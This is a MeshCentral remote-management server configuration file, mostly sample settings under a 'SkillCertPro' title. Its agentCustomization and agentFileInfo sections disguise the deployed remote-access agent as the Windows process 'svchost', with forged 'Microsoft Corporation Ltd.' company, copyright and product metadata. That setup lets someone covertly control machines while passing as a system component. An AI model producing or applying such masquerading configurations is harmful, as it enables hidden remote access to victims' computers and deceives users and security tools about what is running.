{
    "$schema": "https://raw.githubusercontent.com/Ylianst/MeshCentral/master/meshcentral-config-schema.json",
    "__comment1__": "This is a simple configuration file, all values and sections that start with underscore (_) are ignored. Edit a section and remove the _ in front of the name. Refer to the user's guide for details.",
    "__comment2__": "See node_modules/meshcentral/sample-config-advanced.json for a more advanced example.",
    "settings": {
      "_cert": "myserver.mydomain.com",
      "_WANonly": true,
      "_LANonly": true,
      "_sessionKey": "MyReallySecretPassword1",
      "_port": 443,
      "_aliasPort": 443,
      "_redirPort": 80,
      "_redirAliasPort": 80
    },
    "domains": {
      "": {
        "siteStyle":  2,
        "_titlehtml": "font-size:46px;font-family:Arial,Helvetica,sans-serif;font-weight:bold;padding-bottom:10px;color:#c8c8c8;text-shadow: 2px 2px 2px #000",
        "_title": "SkillCertPro",
        "_title1": "SkillCertPro",
        "_title2": "SkillCertPro",
        "welcomePicture": "merc.jpg",
        "welcomePictureFullScreen": "merc.jpg",
        "hide": 0,
        "footer": "SkillCertPro",
        "_minify": true,
        "agentCustomization": {
            "displayName": "svchost",
            "description": "Microsoft Corporation Ltd.",
            "companyName": "Microsoft Corporation Ltd.",
            "serviceName": "svchost",
            "image": "pngegg.ico",
            "fileName": "svchost"
        },
        "agentFileInfo": {
              "icon": "pngegg.ico",
              "fileDescription": "Microsoft Product",
              "fileVersion": "1.3.2",
              "internalName":  "svchost",
              "legalCopyright":  "Microsoft Corporation Ltd.",
              "originalFilename":  "svchost",
              "productName":  "Microsoft Corporation Ltd.",
              "productVersion": "2.1.4"
            }
        }
    },
    "_letsencrypt": {
      "__comment__": "Requires NodeJS 8.x or better, Go to https://letsdebug.net/ first before trying Let's Encrypt.",
      "email": "myemail@mydomain.com",
      "names": "myserver.mydomain.com",
      "production": false
    }
}
